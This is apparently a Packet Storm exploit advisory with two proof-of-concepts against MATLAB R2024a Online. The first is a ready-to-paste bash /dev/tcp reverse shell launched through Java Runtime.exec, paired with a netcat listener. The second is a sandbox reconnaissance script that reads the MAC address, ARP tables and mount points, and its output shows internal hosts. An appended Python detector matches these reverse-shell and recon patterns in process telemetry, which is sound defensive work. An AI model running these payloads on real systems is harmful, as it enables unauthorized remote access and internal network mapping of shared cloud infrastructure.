Description
MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure...
Basic Information
ID
PACKETSTORM:220735
Published
May 11, 2026 at 00:00
==================================================================================================================================
| # Title : MATLAB R2024a RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : I have successfully identified a critical vulnerability in the MATLAB Online environment that allows for arbitrary code execution and a full reverse shell connection.
By leveraging the system function and Java socket libraries within MATLAB, I bypassed the container isolation and established a connection to an external listener.
[+] POC : Place the code below in the MATLAB command prompt
host = '127.0.0.1'; port = 4444;
payload = sprintf('bash -i >& /dev/tcp/%s/%d 0>&1', host, port);
try
    java.lang.Runtime.getRuntime().exec({'bash', '-c', payload});
    fprintf('Payload executed. Check your nc listener.\n');
catch ME
    fprintf('Execution failed: %s\n', ME.message);
end
function copy_stream(i, o), try, b = zeros(1,1024,'int8'); while true, l = i.read(b); if l<=0, break; end, o.write(b,0,l); o.flush(); end, catch, end, end
[+] At the same time, we open a listener with Netcat and wait for the reverse connection. Cmd line: -lvp 4444
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
==================================================================================================================================
| # Title : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : Successfully bypassed the sandbox using fileread to extract the host's MAC address and kernel mount details from /proc/mounts.
[+] POC : Place the code below in the MATLAB command prompt
try
    eth0_mac = fileread('/sys/class/net/eth0/address');
    fprintf('CRITICAL: eth0 MAC Address: %s', eth0_mac);
catch
    disp('Could not read eth0 MAC.');
end
[status, arp_info] = system('arp -a');
if status == 0
    disp('Internal Network Neighbors:');
    disp(arp_info);
else
    disp('ARP command restricted, trying proc/net/arp...');
    try
        arp_proc = fileread('/proc/net/arp');
        disp(arp_proc);
    catch
        disp('ARP info is fully protected.');
    end
end
[status, mount_details] = system('cat /proc/mounts');
disp('Mount Points Analysis:');
disp(mount_details);
[+] Result :
CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0
Internal Network Neighbors:
ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0
? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0
Mount Points Analysis:
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
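Detection sketch for both write-ups above, added here as an example and not part of the original advisories: it walks process-exec telemetry and flags shells and recon commands that descend from the MATLAB process, covering the Runtime.exec() reverse-shell pattern and the system('arp -a') / system('cat /proc/mounts') calls. The event layout, the process name "MATLAB" and all sample events are constructed assumptions.

```python
import re

# Constructed exec events (pid, ppid, comm, argv); the field layout and the
# process name "MATLAB" are assumptions, not taken from the advisory.
EVENTS = [
    {"pid": 100, "ppid": 1,   "comm": "MATLAB", "argv": ["MATLAB", "-nodesktop"]},
    {"pid": 201, "ppid": 100, "comm": "bash",
     "argv": ["bash", "-c", "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"]},
    {"pid": 202, "ppid": 201, "comm": "bash", "argv": ["bash", "-i"]},
    {"pid": 203, "ppid": 100, "comm": "sh", "argv": ["sh", "-c", "arp -a"]},
    {"pid": 204, "ppid": 203, "comm": "arp", "argv": ["arp", "-a"]},
    {"pid": 205, "ppid": 100, "comm": "sh", "argv": ["sh", "-c", "cat /proc/mounts"]},
    {"pid": 206, "ppid": 100, "comm": "sh", "argv": ["sh", "-c", "ls /tmp"]},
    {"pid": 300, "ppid": 1,   "comm": "bash", "argv": ["bash", "-c", "arp -a"]},
]

# Rule name -> pattern matched against the space-joined argv.
RULES = [
    ("reverse_shell", re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")),
    ("interactive_shell", re.compile(r"^(ba)?sh -i$")),
    ("network_recon", re.compile(r"(^|\s)arp(\s|$)|/proc/net/arp")),
    ("mount_recon", re.compile(r"/proc/(self/)?mounts")),
]

def has_ancestor(pid, by_pid, comm):
    """Walk ppid links upward; True if any ancestor has the given comm."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)  # guards against ppid loops in malformed telemetry
        pid = by_pid[pid]["ppid"]
        if pid in by_pid and by_pid[pid]["comm"] == comm:
            return True
    return False

def detect(events, root_comm="MATLAB"):
    """Return (pid, rule) for each exec under root_comm whose command line matches."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not has_ancestor(e["pid"], by_pid, root_comm):
            continue  # same command outside the MATLAB tree is out of scope
        cmdline = " ".join(e["argv"])
        hits += [(e["pid"], name) for name, rx in RULES if rx.search(cmdline)]
    return hits

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The fileread() calls on /sys/class/net/eth0/address and /proc/net/arp run inside the MATLAB process and produce no exec event, so they need file-access auditing rather than this process-tree rule.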